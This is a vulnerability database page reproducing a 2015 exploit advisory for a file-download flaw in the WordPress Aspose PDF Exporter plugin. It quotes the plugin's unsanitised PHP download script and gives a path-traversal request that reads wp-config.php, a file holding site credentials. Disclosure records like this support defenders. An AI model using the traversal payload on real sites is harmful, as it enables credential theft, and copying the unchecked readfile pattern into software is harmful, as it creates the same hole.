Lucene search
K

WordPress Aspose PDF Exporter File Download

🗓️ 29 Mar 2015 00:00:00Reported by Ashiyane Digital Security TeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

WordPress Aspose PDF Exporter File Download Vulnerability, Exploi

Code
`Exploit Title : Wordpress Aaspose-pdf-exporter Plugin File Download   
Vulnerability  
  
Exploit Author : Ashiyane Digital Security Team  
  
Vendor Homepage: https://wordpress.org/plugins/aspose-pdf-exporter/  
  
Download Link : https://downloads.wordpress.org/plugin/aspose-pdf-exporter.zip  
  
Date : 28 / 3 / 2015  
  
Tested On : windows 8.1 + linux Kali  
  
#########################################  
#########################################  
  
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>  
  
Exploit: |  
| [+] Vulnerable file :   
http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php  
  
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>  
  
Vulnerable Code :  
  
<?php  
  
$file = $_GET['file'];  
  
$file_arr = explode('/',$file);  
  
$file_name = $file_arr[count($file_arr) - 1];  
  
header ("Content-type: octet/stream");  
  
header ("Content-disposition: attachment; filename=".$file_name.";");  
  
header("Content-Length: ".filesize($file));  
  
readfile($file);  
  
exit;  
  
?>  
  
http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=[File   
Address]  
  
Examples :   
http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php  
  
  
#########################################  
#########################################  
  
Discovered by : Rq07  
  
#########################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2015 00:00Current
0.1Low risk
Vulners AI Score0.1
21